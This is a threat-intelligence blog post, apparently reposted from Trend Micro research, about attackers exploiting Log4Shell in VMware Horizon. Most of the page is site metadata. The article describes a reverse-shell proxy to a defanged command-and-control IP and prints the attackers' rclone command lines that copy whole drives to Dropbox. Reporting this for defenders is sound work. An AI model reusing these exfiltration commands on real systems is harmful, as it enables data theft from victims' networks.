{"id":47289,"date":"2022-06-28T00:00:00","date_gmt":"2022-06-28T00:00:00","guid":{"rendered":"urn:uuid:17ee1793-2420-22e3-6773-17403541d87e"},"modified":"2022-06-28T00:00:00","modified_gmt":"2022-06-28T00:00:00","slug":"log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/","title":{"rendered":"Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware"},"content":{"rendered":"

<\/p>\n

<\/div>\n

Lateral movement to machines in the network<\/b><\/p>\n

After the initial infection with Cobalt Strike, we observed that the threat actor dropped node.exe, which is a stowaway proxy tool that is publicly available on Github<\/a>. The tool is written in the GO language and can provide many capabilities to threat actors: remote shell execution, upload\/downloading files, and more. In this case, the tool is used to provide a reverse shell to threat actors on IP: 45[.]32.108.54 on port 80. <\/p>\n

After a successful connection with the command and control (C&C) IP, we saw outbound traffic to several internal machines via SMB and WMI. The files mfeann.exe, Lockdown.DLL, and update.exe (accessed via the node.exe tool) were dropped on the identified internal machines. <\/p>\n

Data exfiltration <\/b><\/p>\n

In one case, we found an interesting binary file named update.exe. The file is actually the rclone.exe tool used to exfiltrate data to a specific Dropbox location. While uploading the data, the Rclone tool may upload to different IPs over time:  <\/p>\n

162.125.1[.]14 (Dropbox, Inc.)
162.125.1[.]19 (Dropbox, Inc.)
162.125.2[.]14 (Dropbox, Inc.)
162.125.2[.]19 (Dropbox, Inc.)
162.125.7[.]14 (Dropbox, Inc.)
162.125.7[.]19 (Dropbox, Inc.)<\/p>\n

CLI command:<\/p>\n

cmd.exe \/Q \/c update.exe copy J: 4:1 -q –ignore-existing –max-age 2y –exclude *.exe 1> \\\\127.0.0.1\\ADMIN$\\__1649006901.3590112 2>&1
cmd.exe \/Q \/c update.exe copy L: 4:2 -q –ignore-existing –max-age 2y –exclude *.exe 1> \\\\127.0.0.1\\ADMIN$\\__1649007703.966517 2>&1
cmd.exe \/Q \/c update.exe copy Q: 4:3 -q –ignore-existing –max-age 2y –exclude *.exe 1> \\\\127.0.0.1\\ADMIN$\\__1649007856.0151849 2>&1<\/span><\/p>\n

In another intrusion, the same tool was used for data exfiltration using a different name: Medias.exe. <\/p>\n

Medias.exe copy ‘\\\\[Private IP] \\G$’ dropbox:ag -q –ignore-existing –max-age 2y –auto-confirm –multi-thread-streams 12 –transfers 10 –ignore-errors –exclude “*.{mp4,exe,DLL,log,mov,avi,db,ini,lnk}”<\/span><\/p>\n

Read More HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

We analyzed cases of a Log4Shell vulnerability being exploited in certain versions of the software VMware Horizon. Many of these attacks resulted in data being exfiltrated from the infected systems. However, we also found that some of the victims were infected with ransomware days after the data exfiltration. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":47290,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9520,9555,9523,9509],"class_list":["post-47289","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cloud","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-network","tag-trend-micro-research-research"],"yoast_head":"\nLog4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-06-28T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/g\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/Log4Shell%20vulnerability%20VMware_banner.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware\",\"datePublished\":\"2022-06-28T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/\"},\"wordCount\":301,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.jpg\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cloud\",\"Trend Micro Research : Exploits&Vulnerabilities\",\"Trend Micro Research : Network\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/\",\"name\":\"Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.jpg\",\"datePublished\":\"2022-06-28T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.jpg\",\"width\":639,\"height\":348},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/","og_locale":"en_US","og_type":"article","og_title":"Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-06-28T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/g\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/Log4Shell%20vulnerability%20VMware_banner.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware","datePublished":"2022-06-28T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/"},"wordCount":301,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/06\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.jpg","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cloud","Trend Micro Research : Exploits&Vulnerabilities","Trend Micro Research : Network","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/","url":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/","name":"Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/06\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.jpg","datePublished":"2022-06-28T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/06\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/06\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.jpg","width":639,"height":348},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/47289","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=47289"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/47289\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/47290"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=47289"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=47289"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=47289"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}